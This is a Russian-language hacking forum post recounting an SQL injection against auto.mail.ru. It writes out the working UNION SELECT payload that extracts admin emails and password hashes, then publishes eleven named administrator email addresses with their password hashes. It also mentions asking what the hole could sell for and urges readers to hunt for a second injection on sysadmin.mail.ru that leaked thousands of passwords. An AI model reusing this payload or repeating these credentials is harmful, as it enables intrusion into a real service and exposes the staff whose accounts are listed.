Всем доброго времени суток.
Даже не знаю с чего начать, дык тема старая (в привате нигде ее не было, только в моей голове.).
Статью (если ее так можно назвать) написать уговорил Kusto.
Началось все как обычно у меня всегда все начинается, с поиска xss на mail.ru.
Тыкал с кнопки туда сюда, чувствовал себя исследователем и искал. И на один мой тык по адресу
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//auto.mail.ru/view.html?video_id='1[/COLOR][/COLOR]
мне вывалилась ошибка в sql.
При помощи Уважаемого мною юзера Античата
Nemaniak начали мы ее ковырять.
Итого после долгого брута, sql ошибка вылилась в такой вот запрос
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_password)+from+system_admins+limit+0,1+--+[/COLOR][/COLOR]
А мы увидели хеш пароля от почты
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]aizikovich[/COLOR][COLOR="#007700"]@[/COLOR][COLOR="#0000BB"]mail[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]2e3b8f6d73eb89715150919027e5bf71[/COLOR][COLOR="#007700"]:[/COLOR][/COLOR]
Я сперва подумал, что я добрался до базы админских почтовых ящиков и начал выводить все почтовые ящики перебирая лимит вывода
+limit+0,1 (спасибо за подсказку Maniak), но скоро радость закончилась, так как вывести я смог только хеши паролей от 11 админских ящиков.
Осозновая свою ничтожность, а так же осозновая что мне нафиг не нужны ни пароли, ни хеши от админских ящиков, я пришел на Античат и спросил местных знатоков, сколько же все таки может стоит данная уязвимость, если ее попытаться продать (учитывая что ни сама уязвимость, ни результат ее реализации мне нафиг не нужны, так как раскручивали только из чистого любопытства, было интересно в денежном эквиваленте - на сколько мы тогда наковыряли)
Создал тему про стоимость sql на популярных почтовых серверах
/thread144589.html и получил ответ от Великого Блэксана (он действительно Великий, просто характер у него такой )
Сообщение от
BlackSun
Вообще мы смотрим на вас как на говно ©. Обычная серая масса на ачате и есть школьники
и естественно будучи серой массой (не
белой вороной как сейчас), а значит гамном, я далее тему развивать не стал и забыл про эту sql и ее последствия .
На данный момент sql на мейле прикрыта (уже давно), про хеши я думать забыл (пока мне сегодня не напомнили).
Выкладываю и сам sql запрос и выуженные через нее хеши админских паролей.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//auto.mail.ru/view.html?video_id=-1+UnIon+seLeCt+1,2,3,concat_ws(0x3a,a_email,a_password)+from+system_admins+limit+0,1+--+[/COLOR][/COLOR]
Код HTML:
aizikovich@mail.ru:2e3b8f6d73eb89715150919027e5bf71:
marat.kanzafarov@mail.ru:116791431a767fdf9321875186683b34:
smolyanov@corp.mail.ru:77ef5dc9edd2d4d764399237b3b59892:
chergik@corp.mail.ru:3e5555700638643f230b98a544f287ad:
kabyshev@corp.mail.ru:dffc7be887f428c3f18a60c8a7d85a14:
aleksey_kovanov@mail.ru:b11871cb1f75cb38a8a401add015734b:
prilutskiy@corp.mail.ru:72b4961d6ed4101abfd09321747d45ba:
gagarin@corp.mail.ru:ab41f00cd7aa00e9b679a2d275
nozhkin@corp.mail.ru:a570bf4990157efc9118f7e38d2cdbbe:
rozhkov@corp.mail.ru:2e36b9903435d5da3815d2d298380f6b:
ysadovnikova@corp.mail.ru:38974963b8b8ea9b2d70c6115b091f64:
Хеши наверное все еще живые, не брутил их. Помню тогда вбил их в гугл, и увидел что то их уже кто то брутил (по ходу я был далеко не первым ) и забил на них.
Потом была еще одна sql инъекция на mail.ru (на поддомене http://sysadmin.mail.ru/).
Щас даже не помню где именно была дырка, но помню что были удачно выведены пароли от одной партнерки мейла (около 10 000 паролей) и так же удачно забыты вместе с самим sql запросом.
Нигде, даже в логах не сохранились ни пароли, ни сам запрос, поэтому дерзайте, может не закрыли еще .
С уважением, Satana-fu
Древовидный вид